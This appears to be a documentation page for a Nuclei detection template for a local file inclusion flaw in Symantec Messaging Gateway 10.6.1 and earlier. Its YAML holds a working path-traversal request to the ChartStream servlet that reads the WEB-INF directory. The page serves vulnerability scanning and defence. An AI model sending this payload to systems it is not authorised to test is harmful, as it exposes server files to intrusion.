Symantec Messaging Gateway <=10.6.1 - Local File Inclusion
ID: symantec-messaging-gateway
Severity: high
Author: Random_Robbie
Tags: lfi,messaging,symantec
Description
Section titled “Description”Symantec Messaging Gateway 10.6.1 and prior are vulnerable to local file inclusion.
YAML Source
Section titled “YAML Source”id: symantec-messaging-gateway
info: name: Symantec Messaging Gateway <=10.6.1 - Local File Inclusion author: Random_Robbie severity: high description: Symantec Messaging Gateway 10.6.1 and prior are vulnerable to local file inclusion. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: max-request: 1 tags: lfi,messaging,symantec
http: - method: GET path: - "{{BaseURL}}/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/"
matchers-condition: and matchers: - type: word words: - "struts-default.xml"
- type: status status: - 200# digest: 480a00453043022069280a8bf5a52e7f834728eb6d94914b4f65e1f28283fd13f2f40001fa5af8ff021f5820ec77216092501c78d7f74234b96e839f1d4dbade9a8a9102ddbbb6742f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/symantec-messaging-gateway.yaml"